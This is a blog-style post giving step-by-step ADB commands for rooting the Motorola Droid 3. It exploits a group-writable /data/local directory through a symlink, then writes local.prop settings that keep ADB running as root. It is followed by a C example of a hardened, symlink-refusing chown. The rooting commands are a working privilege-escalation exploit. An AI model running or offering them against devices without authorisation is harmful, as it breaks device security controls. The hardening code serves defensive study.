The Motorola Droid 3 has been rooted! Even more impressive, it was done without the developer ever having touched a Droid 3, and the process itself is more impressive still!
After an audit of the platform, it was discovered that the contents of /data/local are owned by group “shell” and are group-writable. That means the contents of the directory can be modified using ADB. In Linux (and Android, by extension), you can replace a directory with a “symbolic link” (or “symlink”), which is essentially a pointer to another location. Additionally, when you reboot the device, it will change the ownership of the symlink target to group “shell”, which can be used to edit property files and achieve root.
Here’s what to do:
0. Assume the risks of potentially harming your device
1. Enable USB debugging on your smartphone
2. Connect your smartphone to your computer via USB
3. Open a command prompt and navigate to the Android SDK tools folder (which contains the ADB files)
4. Type adb shell (enter)
5. Type mv /data/local/12m /data/local/12m.bak (enter)
6. Type ln -s /data /data/local/12m (enter)
7. Press the power button to physically reboot the phone
8. When it has rebooted, connect using adb shell again
9. Type rm /data/local/12m (enter)
10. Type mv /data/local/12m.bak /data/local/12m (enter)
11. Type mv /data/local.prop /data/local.prop.bak (enter)
12. Type echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop (enter)
13. Type echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop (enter)
14. Type echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop (enter)
15. Type echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop (enter)
16. Type echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop (enter)
17. Type echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop (enter)
18. Type echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop (enter)
19. Type echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop (enter)
20. Type echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop (enter)
21. Type echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.prop (enter)
22. Press the power button to physically reboot the phone
Just in case you were wondering, ro.sys.atvc_allow_all_adb is a Motorola-specific property that prevents ADB from dropping its root privileges.
Congratulations! You should now have root!
Source: Vulnfactory.org
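The reboot step works because the boot-time ownership change follows whatever sits at /data/local/12m, symlink included. As an added example (not code from the original post or from Motorola), the C below contrasts an assumed chown() call with a form that refuses a symlink in the final path component; the function names and the /tmp sandbox are constructed for illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed shape of the boot-time step (not Motorola's code): chown()
 * resolves symlinks, so a link planted at `path` redirects the change. */
int chown_following(const char *path, uid_t uid, gid_t gid)
{
    return chown(path, uid, gid);
}

/* Hardened: refuse a symlink in the final component, require a real
 * directory, and change ownership through the descriptor so the object
 * cannot be swapped between the check and the chown. */
int chown_dir_nofollow(const char *path, uid_t uid, gid_t gid)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;              /* ELOOP or ENOTDIR for a symlink */
    int rc = fchown(fd, uid, gid);
    int saved = errno;
    close(fd);
    errno = saved;
    return rc;
}

/* Constructed sandbox: <tmp>/real is a directory, <tmp>/lnk points at it.
 * Returns 0 when the hardened call accepts real and rejects lnk. */
int demo(void)
{
    char base[] = "/tmp/chown_demo_XXXXXX", real[64], lnk[64];
    if (!mkdtemp(base))
        return -1;
    snprintf(real, sizeof real, "%s/real", base);
    snprintf(lnk, sizeof lnk, "%s/lnk", base);
    if (mkdir(real, 0700) != 0 || symlink(real, lnk) != 0)
        return -1;
    /* (uid_t)-1 / (gid_t)-1 leave ownership unchanged, so no root needed */
    int ok = chown_dir_nofollow(real, (uid_t)-1, (gid_t)-1) == 0 &&
             chown_dir_nofollow(lnk, (uid_t)-1, (gid_t)-1) == -1 &&
             chown_following(lnk, (uid_t)-1, (gid_t)-1) == 0;
    unlink(lnk); rmdir(real); rmdir(base);
    return ok ? 0 : 1;
}

int main(void) { return demo(); }
```

O_NOFOLLOW only guards the final path component, so the parent directories must not be writable by the less-privileged group either.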











